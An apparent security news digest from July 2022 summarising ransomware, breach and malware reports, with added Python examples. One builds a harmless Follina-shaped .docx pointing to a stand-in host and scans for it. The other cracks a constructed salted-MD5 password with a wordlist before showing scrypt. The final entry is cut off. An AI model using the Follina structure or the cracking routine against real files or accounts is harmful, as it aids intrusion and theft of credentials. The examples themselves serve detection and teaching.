                In some countries up to 90% of governmental websites add third-party tracker cookies without users’ consent. This occurs even in countries with strict user privacy laws, according to researchers Matthias Götze (TU Berlin), Srdjan Matic (IMDEA Software), Costas Iordanou (Cyprus University of Technology), Georgios Smaragdakis (TU Delft) and Nikolaos Laoutaris (IMDEA Networks). Previous studies have shown the widespread use of cookies to track users on websites, but this had not been studied so far on … More

                The post Nearly all governmental websites serve cookies or third-party trackers appeared first on Help Net Security.

                "

                Autosummary: A total of 5,500 websites of international organizations, official COVID-19 information and governments of G20 countries were analyzed: Argentina, Australia, Brazil, Canada, China, France, Germany, India, Indonesia, Italy, Japan, Mexico, Russia, Saudi Arabia, South Africa, South Korea, Turkey, UK and USA. "


                Tech support scammers caught by their own cameras

                financial
                2022-07-11 https://blog.malwarebytes.com/tech-support-scams/2022/07/tech-support-scammers-get-caught-on-camera/

                A YouTuber has hacked into the CCTV cameras of an office used by tech support scammers and recorded them being arrested by the police.

                The post Tech support scammers caught by their own cameras appeared first on Malwarebytes Labs.

                "

                Autosummary: CCTV The Youtuber, acting under the handle Scambaiter, turned his attention to Punjab in India to spy on a group of Tech Support scammers. "


                BlackCat (aka ALPHV) ransomware is increasing stakes up to $2.5 million in demands

                exploits ransomware
                2022-07-11 https://www.helpnetsecurity.com/2022/07/11/blackcat-alphv-ransomware/

                Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, has detected a significant increase in the ransom demands made by the notorious BlackCat ransomware gang. According to the researchers, the syndicate actively competes with Conti and the updated LockBit 3.0, and recently introduced an advanced search over stolen victims' passwords and confidential documents leaked on its Tor site. … More

                The post BlackCat (aka ALPHV) ransomware is increasing stakes up to $2.5 million in demands appeared first on Help Net Security.

                "

                Autosummary: BlackCat has been operating since at least November 2021, and launched major attacks in January to disrupt OilTanking GmbH, a German fuel company, and in February 2022, the attack on an aviation company, Swissport. Blackcat ransomware is one of the fastest-growing Ransomware-as-a-Service (RaaS) underground groups practicing so called “quadruple extortion” by pressing victims to pay – leveraging encryption, data theft, denial of service (DoS) and harassment. "


                BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands

                exploits ransomware
                2022-07-11 https://securityaffairs.co/wordpress/133107/cyber-crime/blackcat-alphv-ransomware-demands.html

                The BlackCat (aka ALPHV) ransomware gang, which competes with Conti and LockBit 3.0, has introduced an advanced search over stolen victims' passwords and confidential documents leaked on its Tor site. Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, […]

                The post BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands appeared first on Security Affairs.

                "

                Autosummary: BlackCat has been operating since at least November 2021, and launched major attacks in January to disrupt OilTanking GmbH, a German fuel company, and in February 2022, the attack on an aviation company, Swissport.They introduced an advanced search by stolen victim’s passwords, and confidential documents leaked in the TOR network Resecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, has detected a significant increase in the value of ransom demand requests by the notorious Blackcat ransomware gang. "


                Experts warn of the new 0mega ransomware operation

                exploits ransomware
                2022-07-11 https://securityaffairs.co/wordpress/133098/malware/0mega-ransomware.html

                0mega is a new ransomware operation that is targeting organizations worldwide using a double-extortion model, BleepingComputer reported. The operation has been active since at least May 2022 and already claims to have breached multiple organizations. Victims of the ransomware reported that […]

                The post Experts warn of the new 0mega ransomware operation appeared first on Security Affairs.

                "

                Autosummary: "


                Ransomware gang now lets you search their stolen data

                exploits
                2022-07-11 https://www.bleepingcomputer.com/news/security/ransomware-gang-now-lets-you-search-their-stolen-data/
                Two ransomware gangs and a data extortion group have adopted a new strategy to force victim companies to pay threat actors to not leak stolen data. [...]

                Autosummary: [Image: a victim's searchable data on the leak site. Source: BleepingComputer] This is a step forward in the extortion business, as it puts pressure on the victim to pay the ransom to have the data removed from the web and avoid the potential risk of class action lawsuits.


                Rethinking Vulnerability Management in a Heightened Threat Landscape

                exploits
                2022-07-11 https://threatpost.com/rethinking-vulnerability-management/180177/
                Find out why a vital component of vulnerability management needs to be the capacity to prioritize, from Mariano Nunez, CEO of Onapsis and Threatpost Infosec Insiders columnist.

                Autosummary: Then, with scores assigned and prioritization clearly defined, security teams can make step-by-step plans for remediation, making resolutions simple and making meaningful improvements to security posture with each step.


                Ericsson partners with Thales and Qualcomm to deploy 5G networks into space

                industry
                2022-07-11 https://www.helpnetsecurity.com/2022/07/12/ericsson-thales-qualcomm/

                Ericsson, Thales, and Qualcomm Technologies are planning to take 5G out of this world and across a network of Earth-orbiting satellites. After having each conducted detailed research, which included multiple studies and simulations, the parties plan to enter smartphone-use-case-focused testing and validation of 5G non-terrestrial networks (5G NTN). The result could effectively mean that a future 5G smartphone could use 5G connectivity anywhere on Earth and provide complete global coverage for wideband data services, including … More

                The post Ericsson partners with Thales and Qualcomm to deploy 5G networks into space appeared first on Help Net Security.

                "

                Autosummary: Erik Ekudden, Senior Vice President and Chief Technology Officer, Ericsson, says: “This testing and validation cooperation between Ericsson, Thales and Qualcomm Technologies will be a major milestone in the history of communications as the ultimate result could effectively mean that no matter where you are on Earth – in the middle of an ocean or the remotest forest – high-end, secure and cost-effective connectivity will be available through collaborative 5G satellite and terrestrial connectivity.” "


                Maastricht University wound up earning money from its ransom payment

                financial
                2022-07-10 https://www.bleepingcomputer.com/news/security/maastricht-university-wound-up-earning-money-from-its-ransom-payment/
                Maastricht University (UM), a Dutch university with more than 22,000 students, said last week that it has recovered the ransom paid after a ransomware attack that hit its network in December 2019. [...]

                Autosummary: UM said at the time that it paid a 30 bitcoin ransom (roughly €200,000 at the time) for the ransomware decryptor, which allowed the university to avoid delaying exams and losing all the research, educational, and staff data, as well as info on salary payments for approximately 4,500 employees.


                French telephone operator La Poste Mobile suffered a ransomware attack

                exploits ransomware
                2022-07-10 https://securityaffairs.co/wordpress/133080/cyber-crime/la-poste-mobile-ransomware.html

                French virtual mobile operator (MVNO) La Poste Mobile was hit by a ransomware attack that impacted administrative and management services. The attack hit La Poste Mobile on July 4 and paralyzed administrative and management services. The company pointed out that threat actors may have accessed data of its customers, […]

                The post French telephone operator La Poste Mobile suffered a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: La réalité matérielle de l"attaque ne fait pas un doute, même si celle-ci était presque passée inaperçue… #ransomware https://t.co/Ef7u7jOah0 — Valéry Rieß-Marchive (@ValeryMarchive) July 8, 2022 The gang has been active since at least 2019 and today it is one of the most active ransomware gangs. "


                North Korean APT targets US healthcare sector with Maui ransomware

                exploits ransomware
                2022-07-10 https://blog.malwarebytes.com/ransomware/2022/07/north-korean-apt-targets-us-healthcare-sector-with-maui-ransomware/

                CISA warns of an unusual ransomware.

                The post North Korean APT targets US healthcare sector with Maui ransomware appeared first on Malwarebytes Labs.

                "

                Autosummary: State-sponsored North Korean threat actors have been targeting the US Healthcare and Public Health (HPH) sector for the past year using the Maui ransomware, according to a joint cybersecurity advisory (CSA) from the FBI, Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury. North Korean state-sponsored cyber-actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services. "


                4 ways businesses can save money on cyber insurance

                financial
                2022-07-10 https://blog.malwarebytes.com/business/2022/07/4-ways-businesses-can-save-money-on-cyber-insurance/

                When it comes to insurance, better security means better savings.

                The post 4 ways businesses can save money on cyber insurance appeared first on Malwarebytes Labs.

                "

                Autosummary: Endpoint detection and response (EDR) is a form of endpoint protection that detects and protects against ransomware, malware, trojans, rootkits, backdoors, viruses, brute force attacks, and “zero-day” unknown threats. For this article, we looked at security tips from the top five biggest cyber insurance companies—AXA XL, Chubb, AIG, Travelers, and AXIS—and found four commonalities across what they had to say. Better security means better savings Without cyber insurance, you can expect to pay a lot of cash to cover the cost of a data breach, and many companies are investing in it as a result. "


                Evolution of the LockBit Ransomware operation relies on new techniques

                exploits ransomware
                2022-07-09 https://securityaffairs.co/wordpress/133027/cyber-crime/lockbit-2-0-evolution.html

                Experts have documented the evolution of the LockBit ransomware, which leverages multiple techniques to infect targets and evade detection. The Cybereason Global Security Operations Center (GSOC) Team publishes Cybereason Threat Analysis Reports that investigate the threat landscape and provide recommendations for mitigating attacks. The researchers focused on the evolution of the LockBit ransomware, detailing two infections occurring […]

                The post Evolution of the LockBit Ransomware operation relies on new techniques appeared first on Security Affairs.

                "

                Autosummary: “In other cases, affiliates would use a more traditional phishing email that will allow them to remotely connect to a network via an employee’s computer, or utilize malicious attachments, downloads, application patch exploits or vulnerabilities to gain access to a network.” "


                Hackers Exploiting Follina Bug to Deploy Rozena Backdoor

                exploits
                2022-07-09 https://thehackernews.com/2022/07/hackers-exploiting-follina-bug-to.html
                A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor on Windows systems. "Rozena is a backdoor malware that is capable of injecting a remote shell connection back to the attacker's machine," Fortinet FortiGuard Labs researcher Cara Lin said in a report this week. Tracked as CVE-2022-30190, the


                Previously undocumented Rozena backdoor delivered by exploiting the Follina bug

                exploits
                2022-07-09 https://securityaffairs.co/wordpress/133051/hacking/follina-bug-rozena-backdoor.html

                Threat actors are exploiting the disclosed Follina Windows vulnerability to distribute the previously undocumented Rozena backdoor. Fortinet FortiGuard Labs researchers observed a phishing campaign that is leveraging the recently disclosed Follina security vulnerability (CVE-2022-30190, CVSS score 7.8) to distribute a previously undocumented backdoor on Windows systems. The Follina issue is a remote code execution vulnerability […]

                The post Previously undocumented Rozena backdoor delivered by exploiting the Follina bug appeared first on Security Affairs.

                "

                Autosummary: The Rozena backdoor is able to inject a remote shell connection back to the attacker’s machine The attack chain leverages a weaponized Office document that once is clicked, it starts connecting to an external Discord CDN URL to download an HTML file (index.htm). "
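
Both Follina entries above describe the same first stage: an Office document that reaches out to an external URL (here a Discord CDN-hosted index.htm) rather than carrying its payload inline. In the Follina (CVE-2022-30190) documents this reference lives in the document's relationship part, which is plain XML inside the .docx zip container, so it can be checked on a mail gateway or file share without rendering the document or triggering the MSDT handler that the fetched HTML invokes. The scanner below is an added example, not Fortinet's or Microsoft's code and not from either article. It builds a constructed, payload-free .docx in memory with one external oleObject relationship (the layout Follina samples used) and flags external relationships that point at remote URLs; the sample URL, relationship Id and severity labels are assumptions made for the example.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"


def build_sample_docx(external_target=None, rel_type=OLE_TYPE):
    """Build a minimal, constructed .docx in memory. With `external_target` set it
    carries one relationship with TargetMode="External", which is the container
    structure Follina documents used to pull a remote HTML stage. No payload."""
    external = ""
    if external_target is not None:
        external = (f'<Relationship Id="rId99" Type="{rel_type}" '
                    f'Target="{external_target}" TargetMode="External"/>')
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" '
        'Target="styles.xml"/>'
        f"{external}"
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/styles.xml", "<w:styles/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def scan_docx(data):
    """Return findings for every external relationship whose target is a remote
    URL. An external oleObject is the Follina shape and is rated high; other
    external types (e.g. ordinary hyperlinks) are common in benign files and
    are reported at medium so a reviewer can triage them."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                if not re.match(r"^https?://", target, re.IGNORECASE):
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rtype,
                    "target": target,
                    "severity": "high" if rtype == "oleObject" else "medium",
                })
    return findings


if __name__ == "__main__":
    sample = build_sample_docx("https://cdn.example.invalid/attachments/index.htm")
    for finding in scan_docx(sample):
        print(finding)
```

The same loop covers .xlsx and .pptx, which use identical relationship parts. A hit on an external oleObject is worth quarantining on its own; for the medium findings, the target host is what matters, and a document whose only external reference is a public file-sharing CDN deserves a look even when the relationship type is innocuous.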


                Mangatoon data breach exposes data from 23 million accounts

                financial
                2022-07-09 https://www.bleepingcomputer.com/news/security/mangatoon-data-breach-exposes-data-from-23-million-accounts/
                Manga comic reading app Mangatoon has suffered a data breach that exposed the account information of 23 million users after a hacker stole it from an Elasticsearch database. [...]

                Autosummary: "The breach exposed names, email addresses, genders, social media account identities, auth tokens from social logins and salted MD5 password hashes," tweeted the HIBP account.
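
Both Mangatoon entries (this one and the Malwarebytes one above) note that the dump contained salted MD5 password hashes. Salting defeats precomputed tables and hides which users share a password, but MD5 itself is so cheap that an attacker holding the salt and the hash can test enormous numbers of candidates per second, so weak passwords fall in moments. The following added example, not Mangatoon's code and not from either article, recovers a weak password from a constructed salted-MD5 record with a tiny wordlist, then stores the same password with the standard library's scrypt, where every guess costs a deliberately large amount of memory and time. The record layout (hex salt, "$", hex digest), the wordlist and the scrypt parameters are assumptions made for the example.

```python
import hashlib
import hmac
import os
import time

# Constructed wordlist (not from any real dump).
WORDLIST = ["123456", "password", "qwerty", "manga2022", "letmein", "dragon"]


def md5_salted(password, salt):
    # The weak scheme: a single fast MD5 over salt || password.
    return hashlib.md5(salt + password.encode()).hexdigest()


def make_md5_record(password, salt=None):
    """Store a password the way the breached site did (assumed layout)."""
    salt = salt or os.urandom(8)
    return salt.hex() + "$" + md5_salted(password, salt)


def crack_md5_record(record, wordlist):
    """Offline dictionary attack: one MD5 per candidate, effectively free."""
    salt_hex, digest = record.split("$")
    salt = bytes.fromhex(salt_hex)
    for candidate in wordlist:
        if hmac.compare_digest(md5_salted(candidate, salt), digest):
            return candidate
    return None


# Memory-hard parameters for interactive logins (an assumption; tune to budget).
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def _scrypt(password, salt):
    return hashlib.scrypt(password.encode(), salt=salt,
                          n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)


def make_scrypt_record(password, salt=None):
    """The hardened form: same salt idea, but a memory-hard KDF per guess."""
    salt = salt or os.urandom(16)
    return salt.hex() + "$" + _scrypt(password, salt).hex()


def verify_scrypt_record(password, record):
    salt_hex, key_hex = record.split("$")
    key = _scrypt(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(key.hex(), key_hex)


def crack_scrypt_record(record, wordlist):
    """Same dictionary attack; each guess now pays the full scrypt cost."""
    for candidate in wordlist:
        if verify_scrypt_record(candidate, record):
            return candidate
    return None


def time_attack(crack_fn, record, wordlist):
    """Return (recovered_password_or_None, seconds_spent)."""
    start = time.perf_counter()
    found = crack_fn(record, wordlist)
    return found, time.perf_counter() - start


if __name__ == "__main__":
    weak = make_md5_record("manga2022")
    strong = make_scrypt_record("manga2022")
    for label, fn, rec in (("salted MD5", crack_md5_record, weak),
                           ("scrypt", crack_scrypt_record, strong)):
        found, secs = time_attack(fn, rec, WORDLIST)
        print(f"{label:10s} recovered={found!r} in {secs:.4f}s for {len(WORDLIST)} guesses")
```

Both schemes "recover" the weak password, which is the point: a KDF cannot rescue "manga2022", it can only make each guess expensive enough that the attacker's budget runs out before the wordlist does. With the parameters above, six scrypt guesses take longer than the whole MD5 run by orders of magnitude, and that ratio holds at GPU scale because scrypt's per-guess memory does not shrink. Argon2id is the usual choice where a third-party library is acceptable; scrypt is shown here because it ships with Python.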


                Apple Lockdown Mode will protect users against highly targeted cyberattacks

                ciber
                2022-07-09 https://securityaffairs.co/wordpress/133065/mobile-2/apple-lockdown-mode.html

                Apple plans to introduce a security feature, called Lockdown Mode, to protect its users against “highly targeted cyberattacks.” The recent wave of sophisticated attacks against Apple users (e.g., Pegasus, DevilsTongue, and Hermit) prompted the tech giant to develop the feature. It will be implemented in iOS 16, iPadOS […]

                The post Apple Lockdown Mode will protect users against highly targeted cyberattacks appeared first on Security Affairs.

                "

                Autosummary: The recent wave of sophisticated attacks against Apple users (i.e. Pegasus, DevilsTongue, and Hermit) urged the tech giant to develop a new security feature, called Lockdown Mode, to protect its users against highly targeted cyberattacks. "


                New Checkmate ransomware targets QNAP NAS devices

                exploits ransomware
                2022-07-08 https://securityaffairs.co/wordpress/132989/malware/checkmate-ransomware-targets-qnap-nas.html

                Taiwanese vendor QNAP warns of a new strain of ransomware, dubbed Checkmate, that is targeting its NAS devices through weak passwords. Threat actors target devices exposed online with the SMB service enabled and perform brute-force attacks against accounts […]

                The post New Checkmate ransomware target QNAP NAS devices appeared first on Security Affairs.

                "

                Autosummary: In June, Bleeping Computer and MalwareHunterTeam researchers, citing user reports and sample submissions on the ID Ransomware platform, warned of a new wave of ech0raix ransomware attacks targeting QNAP Network Attached Storage (NAS) devices. Updating QTS, QuTS hero, or QuTScloud Log on to QTS, QuTS hero or QuTScloud as administrator. "


                Free decryptor released for AstraLocker, Yashma ransomware victims

                exploits ransomware
                2022-07-08 https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-astralocker-yashma-ransomware-victims/
                New Zealand-based cybersecurity firm Emsisoft has released a free decryption tool to help AstraLocker and Yashma ransomware victims recover their files without paying a ransom. [...]

                Autosummary: The list of previously released decryption tools includes Ragnarok, Avaddon, SynAck, AES-NI, Shade, FilesLocker, TeslaCrypt, Crysis, Ziggy, and FonixLocker.


                Report: Brazil must do more to encrypt, back up data

                latam
                2022-07-08 https://blog.malwarebytes.com/cybercrime/2022/07/report-brazil-must-do-more-to-encrypt-back-up-data/

                We take a look at a report which indicates Brazil has a long way to go with regard to encrypting and backing up data.

                The post Report: Brazil must do more to encrypt, back up data appeared first on Malwarebytes Labs.

                "

                Autosummary: that claim to perform backups (254 out of 385), despite implementing physical access control mechanisms to the storage location of these files, do not store them encrypted, which carries a risk of data leakage from the organization, which can cause enormous losses, especially if it involves sensitive and/or confidential information.66.6% of organizations that claim to perform backups (254 out of 385), despite implementing physical access control mechanisms to the storage location of these files, do not store them encrypted, which carries a risk of data leakage from the organization, which can cause enormous losses, especially if it involves sensitive and/or confidential information.60.2% of organizations (247 out of 410) do not keep their copies in at least one non-remotely accessible destination, which carries a risk that, in a cyberattack, the backup files themselves end up being corrupted, deleted and/or encrypted by the attacker or malware, rendering the organization’s backup/restore process equally ineffective. "


                Checkmate ransomware hits QNAP NAS devices

                exploits ransomware
                2022-07-08 https://www.helpnetsecurity.com/2022/07/08/checkmate-ransomware-qnap-nas/

                QNAP Systems is warning about Checkmate, a new piece of ransomware targeting users of its network-attached storage (NAS) appliances. “Preliminary investigation indicates that Checkmate attacks via SMB services exposed to the internet, and employs a dictionary attack to break accounts with weak passwords,” the company says. “Once the attacker successfully logs in to a device, they encrypt data in shared folders and leave a ransom note with the file name ‘!CHECKMATE_DECRYPTION_README’ in each folder.” About … More

                The post Checkmate ransomware hits QNAP NAS devices appeared first on Help Net Security.

                "

                Autosummary: "


                Researchers Detail Techniques LockBit Ransomware Using to Infect its Targets

                exploits ransomware
                2022-07-08 https://thehackernews.com/2022/07/researchers-detail-techniques-lockbit.html
                LockBit ransomware attacks are constantly evolving by making use of a wide range of techniques to infect targets while also taking steps to disable endpoint security solutions. "The affiliates that use LockBit's services conduct their attacks according to their preference and use different tools and techniques to achieve their goal," Cybereason security analysts Loïc Castel and Gal Romano said.

                Autosummary: LockBit, which operates on a ransomware-as-a-service (RaaS) model like most groups, was first observed in September 2019 and has since emerged as the most dominant ransomware strain this year, surpassing other well-known groups like Conti, Hive, and BlackCat.


                U.S. Healthcare Orgs Targeted with Maui Ransomware

                exploits ransomware
                2022-07-08 https://threatpost.com/healthcare-maui-ransomware/180154/
                State-sponsored actors are deploying the unique malware, which targets specific files and leaves no ransom note, in ongoing attacks.

                Autosummary: “For truly organizational crippling ransomware attacks, threat actors need to manually identify the important assets and the weak points to truly take down a victim,” observed John Bambenek, principal threat hunter at Netenrich, a security and operations analytics SaaS firm, in an email to Threatpost. “Cyber criminals want to get paid quickly and effectively, and with little information for the victim the attack is increasingly malicious in nature,” observed James McQuiggan, security awareness advocate at security firm KnowBe4, in an e-mail to Threatpost.


                Microsoft fixes bug crashing Office apps when opening cloud documents

                exploits
                2022-07-08 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-crashing-office-apps-when-opening-cloud-documents/
                Microsoft has fixed a known issue that was causing Office applications like Word and Excel to crash when working with cloud documents. [...]

                Autosummary: "Word, Excel, and PowerPoint might close unexpectedly when opening, closing, saving, uploading, or downloading cloud files in Office Version 2205," the company described the issue on its support website.


                Sneaky Orbit Malware Backdoors Linux Devices

                exploits
                2022-07-08 https://threatpost.com/sneaky-malware-backdoors-linux/180158/
                The novel threat steals data and can affect all processes running on the OS, stealing information from different commands and utilities and then storing it on the affected machine.

                Autosummary: “The malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands,” Fishbein wrote in the post. This hooking allows the malware to infect the whole machine and harvest credentials, evade detection, gain persistence, and provide remote access to the attackers, Fishbein wrote.


                Emsisoft: Victims of AstraLocker and Yashma ransomware can recover their files for free

                exploits ransomware
                2022-07-08 https://securityaffairs.co/wordpress/133014/malware/emsisoft-astralocker-yashma-decryptor.html

                Emsisoft has released a free decryption tool that allows victims of the AstraLocker and Yashma ransomware to recover their files without paying a ransom. Cybersecurity firm Emsisoft released a free decryptor tool that allows victims of the AstraLocker and Yashma ransomware to recover their files without paying a ransom. The security firm states that the […]

                The post Emsisoft: Victims of AstraLocker and Yashma ransomware can recover their files for free appeared first on Security Affairs.

                "

                Autosummary: The Yashma decryptor released by the company works for the Chaos-based versions using .AstraLocker or a random .[a-z0-9]{4} extension. "


                The Week in Ransomware - July 8th 2022 - One down, many to go

                exploits ransomware
                2022-07-08 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-july-8th-2022-one-down-many-to-go/
                While we continue to see new ransomware operations launch, we also received some good news this week, with another ransomware shutting down. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @LawrenceAbrams, @fwosar, @VK_Intel, @demonslay335, @Seifreed, @struppigel, @FourOctets, @malwareforme, @DanielGallagher, @PolarToffee, @serghei, @jorntvdw, @Ionut_Ilascu, @malwrhunterteam, @billtoulas, @PogoWasRight, @ValeryMarchive, @vxunderground, @emsisoft, @Unit42_Intel, @AdvIntel, @CISecurity, @pcrisk, and @Amigo_A_. This week, information about attacks also became public, including IT services giant SHI, Quantum ransomware hitting PFC, and the US government warning that the Maui ransomware is targeting healthcare.


                New 0mega ransomware targets businesses in double-extortion attacks

                exploits ransomware
                2022-07-08 https://www.bleepingcomputer.com/news/security/new-0mega-ransomware-targets-businesses-in-double-extortion-attacks/
                A new ransomware operation named "0mega" targets organizations worldwide in double-extortion attacks and demands millions of dollars in ransoms. [...]


                Driving to France this summer? Watch out for scam websites before you go

                financial
                2022-07-08 https://www.welivesecurity.com/2022/07/08/driving-france-summer-watch-out-scam-websites/

                Scammers don't take the summer off – be on your guard when buying your Crit'Air sticker

                The post Driving to France this summer? Watch out for scam websites before you go appeared first on WeLiveSecurity

                Autosummary: In other words, as a scammer, you do not have to successfully trick every possible victim for your site to successfully make you some quick, and almost free, money.


                Cyberattacks against law enforcement are on the rise

                ciber
                2022-07-07 https://www.helpnetsecurity.com/2022/07/07/cyberattacks-against-law-enforcement-rise/

                Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has registered an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Threat actors are hacking email and other accounts which belong to law enforcement officers and their internal systems. The emerging trend consists of threat actors sending fake subpoenas and EDRs (Emergency Data Requests) to their victims from the hacked law enforcement email accounts. Using such capabilities, the … More

                The post Cyberattacks against law enforcement are on the rise appeared first on Help Net Security.

                Autosummary: The most typical scenarios involving attacks on law enforcement systems include: protest activity (15%), unauthorized access (25%), cyberespionage (40%), law enforcement systems and applications abuse (8%), and data theft (12%). Based on the published research, such malicious activity is especially visible in countries of Latin America, South-East Asia, and offshore jurisdictions.


                Socura launches Managed Vulnerability Scanning service to help users identify potential vulnerabilities

                exploits
                2022-07-07 https://www.helpnetsecurity.com/2022/07/07/socura-managed-vulnerability-scanning/

                Socura released its new Managed Vulnerability Scanning (MVS) service. Socura’s MVS service has been designed to help clients identify potential vulnerabilities and misconfigurations across all on- and off-premises systems, including their local network, cloud applications, web applications and mobile devices. This allows them to prioritise their remediation efforts, stay compliant with cyber security regulations, and be more proactive in resolving security issues. The service offers continuous identification and mitigation of vulnerabilities, can run on demand … More

                The post Socura launches Managed Vulnerability Scanning service to help users identify potential vulnerabilities appeared first on Help Net Security.

                "

                Autosummary: "


                Healthcare organizations targeted with Maui ransomware

                exploits ransomware
                2022-07-07 https://www.helpnetsecurity.com/2022/07/07/healthcare-maui-ransomware/

                A less known ransomware threat dubbed Maui has been and is likely to continue hitting healthcare organizations, a new CISA alert warns. Maui is unusual in many ways: it does not show a ransom note, it does not rely upon external infrastructure to receive encryption keys, and it does not encrypt files and/or systems indiscriminately. Instead, its operators – believed to be North Korean state-sponsored cyber actors – operate it manually and choose which things … More

                The post Healthcare organizations targeted with Maui ransomware appeared first on Help Net Security.

                "

                Autosummary: Maui ransomware encryption At the inner layer, files are encrypted using AES with a unique 16-byte key for each file, and the AES keys are RSA-encrypted using a key pair generated the first time Maui is run, Silas Cutler, Principal Reverse Engineer at Stairwell, explained. "


                Researchers Warn of New OrBit Linux Malware That Hijacks Execution Flow

                exploits
                2022-07-07 https://thehackernews.com/2022/07/researchers-warn-of-new-orbit-linux.html
                Cybersecurity researchers have taken the wraps off a new and entirely undetected Linux threat dubbed OrBit, signaling a growing trend of malware attacks geared towards the popular operating system. The malware gets its name from one of the filenames that's utilized to temporarily store the output of executed commands ("/tmp/.orbit"), according to cybersecurity firm Intezer. "It can be installed

                Autosummary: The rogue shared library is engineered to hook functions from three libraries — libc, libcap, and Pluggable Authentication Module (PAM) — causing existing and new processes to use the modified functions, essentially permitting it to harvest credentials, hide network activity, and set up remote access to the host over SSH, all the while staying under the radar.


                Smashing Security podcast #282: Raising money through ransomware, China’s mega-leak, and hackers for hire

                financial exploits ransomware
                2022-07-07 https://grahamcluley.com/smashing-security-podcast-282/
                A hacked university might have made a profit after paying a cryptocurrency ransom, China suffers possibly the biggest data breach in history, and Reuters investigates digital mercenaries. All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this … Continue reading "Smashing Security podcast #282: Raising money through ransomware, China’s mega-leak, and hackers for hire"


                North Korean Maui Ransomware Actively Targeting U.S. Healthcare Organizations

                exploits ransomware
                2022-07-07 https://thehackernews.com/2022/07/north-korean-maui-ransomware-actively.html
                In a new joint cybersecurity advisory, U.S. cybersecurity and intelligence agencies have warned about the use of Maui ransomware by North Korean government-backed hackers to target the healthcare sector since at least May 2021. "North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health

                Autosummary: "North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services," the authorities noted.


                OrBit, a new sophisticated Linux malware still undetected

                exploits
                2022-07-07 https://securityaffairs.co/wordpress/132966/hacking/orbit-linux-malware.html

                Cybersecurity researchers warn of new malware, tracked as OrBit, which is a fully undetected Linux threat. Cybersecurity researchers at Intezer have uncovered a new Linux malware, tracked as OrBit, that is still undetected. The malware can be installed either as a volatile implant or by achieving persistence on the compromised systems. The malware implements advanced evasion […]

                The post OrBit, a new sophisticated Linux malware still undetected appeared first on Security Affairs.


                Quantum ransomware attack affects 657 healthcare orgs

                exploits ransomware
                2022-07-07 https://www.bleepingcomputer.com/news/security/quantum-ransomware-attack-affects-657-healthcare-orgs/
                Professional Finance Company Inc. (PFC), a full-service accounts receivables management company, says that a ransomware attack in late February led to a data breach affecting over 600 healthcare organizations. [...]

                Autosummary: This is part of Conti's new modus operandi where its members have either infiltrated or taken control of other ransomware operations such as Hive, AvosLocker, BlackCat, and Hello Kitty or data extortion gangs like Karakurt, BlackByte, and the Bazarcall collective.


                QNAP warns of new Checkmate ransomware targeting NAS devices

                exploits ransomware
                2022-07-07 https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-checkmate-ransomware-targeting-nas-devices/
                Taiwan-based network-attached storage (NAS) vendor QNAP warned customers to secure their devices against attacks using Checkmate ransomware to encrypt data. [...]

                Autosummary: You should also disable SMB 1 by logging into QTS, QuTS hero, or QuTScloud, going to Control Panel > Network & File > Win/Mac/NFS/WebDAV > Microsoft Networking, and selecting "SMB 2 or higher" after clicking on Advanced Options.


                Online programming IDEs can be used to launch remote cyberattacks

                ciber
                2022-07-07 https://www.bleepingcomputer.com/news/security/online-programming-ides-can-be-used-to-launch-remote-cyberattacks/
                Security researchers are warning that hackers can abuse online programming learning platforms to remotely launch cyberattacks, steal data, and scan for vulnerable devices, simply by using a web browser. [...]

                Autosummary: "In addition, in order to prevent individual malpractice, we have implemented a responsible disclosure policy and monitor our systems on an ongoing basis to mitigate risk" - DataCamp. Abuse likely possible on other platforms: although Profero did not extend their research to other learning platforms, the researchers believe that DataCamp is not the only one that hackers could abuse.


                Apple slaps hard against ‘mercenary’ surveillance-as-a-service industry

                industry
